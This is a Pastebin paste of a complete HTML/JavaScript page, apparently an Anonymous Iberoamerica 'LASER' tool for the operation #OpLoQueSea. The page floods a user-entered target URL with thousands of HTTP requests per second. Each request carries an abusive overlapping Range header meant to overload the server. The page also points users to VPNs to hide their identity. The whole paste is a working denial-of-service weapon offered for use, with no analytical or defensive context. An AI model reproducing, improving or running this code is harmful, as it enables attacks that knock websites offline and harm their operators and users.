Advertisement
Joe_Yabuki

WebHive 3.0

Apr 10th, 2014
7,174
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.47 KB | None | 0 0
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2.  
  3. <html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  4.  
  5. <link rel="icon" type="image/png" href="http://i.imgur.com/ATn9J.jpg" /><title>#OpLoQueSea - Webhive 3.0</title>
  6. <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0;">
  7. <style type="text/css">
  8. html, body, form, fieldset, p, div, h1, h2, h3, h4, h5, h6 { margin: 0; padding: 0; -webkit-text-size-adjust: none; }
  9. body { background: #d7d7d7; color: #000000; font-family: Helvetica; font-size: 16px; }
  10. a:link, a:hover, a:active, a:visited { text-decoration: none; color: #578aad; }
  11. input { width: 300px; height: 30px; font-size: 20px; font-weight: bold; }
  12. button { width: 250px; height: 60px; font-size: 20px; font-weight: bold; }
  13. h1 { background: #d7d7d7; color: #000000; font-size: 45px; font-weight: bold; }
  14. #container { padding-top: 20px; overflow: auto; text-align: center; }
  15. #section { background: #cbc9c9; margin: 10px; padding: 10px; border-radius: 10px; -moz-border-radius: 10px; -webkit-border-radius: 10px; }
  16. .title { color: #000000; font-size: 16px; font-weight: bold; font-style: italic; padding-bottom: 5px; }
  17. .required { color: #d74646; font-size: 25px; font-weight: bold; font-style: italic; }
  18. .success { color: #8cbc26; font-size: 16px; font-weight: bold; font-style: italic; padding-bottom: 5px; }
  19. .failed { color: #d74646; font-size: 16px; font-weight: bold; font-style: italic; padding-bottom: 5px; }
  20. .number { color: #363635; font-family: Helvetica; font-size: 40px; font-weight: bold; padding-bottom: 5px; }
  21. #footer { color: #363635; font-size: 12px; font-style: italic; margin-bottom: 10px; }
  22. </style>
  23. </head>
  24. <body onload="">
  25. <div id="container">
  26. <h2>Carga Mi LASER #Anonymous #Iberoamerica</h2>
  27. <h3> #OpLoQueSea </h3>
  28.  
  29. <h5>Descarga una VPN--> <a href="http://anonopsibero.blogspot.com/p/vpn.html"> VPNs </a></h5>
  30. <div id="section">
  31.  
  32. <div class="title">Target URL<span class="required">*</span></div>
  33.  
  34. <input type="text" id="targetURL" value="http://Aca_va_el_target.com">
  35. </div>
  36. <div id="section">
  37. <div class="title">Solicitudes por Segundo</div>
  38. <input type="text" id="rps" value="5000" style="">
  39. </div>
  40. <div id="section">
  41. <button id="fireButton" style="">EMPEZAR</button>
  42.  
  43. </div>
  44.  
  45. <div id="section">
  46.  
  47. <div class="title">Solicitudes</div>
  48. <div class="number" id="requestedCtr">0</div>
  49. <div class="success">Logros</div>
  50. <div class="number" id="succeededCtr">0</div>
  51. <div class="failed">Fallidos</div>
  52.  
  53. <div class="number" id="failedCtr">0</div>
  54.  
  55. </div>
  56.  
  57. <div id="footer"></div>
  58. </div>
  59.  
  60. <script>
  61. (function () {
  62.  
  63. var fireInterval;
  64. var isFiring = false;
  65.  
  66. var requestedCtrNode = document.getElementById("requestedCtr"),
  67. succeededCtrNode = document.getElementById("succeededCtr"),
  68. failedCtrNode = document.getElementById("failedCtr"),
  69. targetURLNode = document.getElementById("targetURL"),
  70. fireButton = document.getElementById("fireButton"),
  71. rpsNode = document.getElementById("rps"),
  72. timeoutNode = document.getElementById("timeout");
  73.  
  74. var targetURL = targetURLNode.value;
  75. targetURLNode.onchange = function () {
  76. targetURL = this.value;
  77. };
  78.  
  79. var requestedCtr = 0,
  80. succeededCtr = 0,
  81. failedCtr = 0;
  82.  
  83. var methods = new Array("HEAD", "POST", "GET");
  84.  
  85. var makeHttpRequest = function () {
  86. var rID =Number(Math.random());
  87. var randomNum=Math.floor(Math.random()*2);
  88. jsHTTP = new XMLHttpRequest();
  89. jsHTTP.open(methods[randomNum],targetURL,true);
  90. jsHTTP.setRequestHeader("Referer", "");
  91. jsHTTP.setRequestHeader("Transfer-Encoding", "chunked");
  92. jsHTTP.setRequestHeader("Range", "bytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-");
  93. jsHTTP.send("id="+rID);
  94. onRequest(rID);
  95. };
  96.  
  97. var onRequest = function (rID) {
  98. requestedCtr++;
  99. requestedCtrNode.innerHTML = requestedCtr;
  100. succeededCtrNode.innerHTML = requestedCtr;
  101. };
  102.  
  103. fireButton.onclick = function () {
  104. if (isFiring) {
  105. clearInterval(fireInterval);
  106. isFiring = false;
  107. this.innerHTML = "EMPEZAR";
  108. } else {
  109. isFiring = true;
  110. this.innerHTML = "PARAR";
  111. fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(rpsNode.value) | 0));
  112. }
  113. };
  114.  
  115. })();
  116. </script>
  117.  
  118.  
  119.  
  120. </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement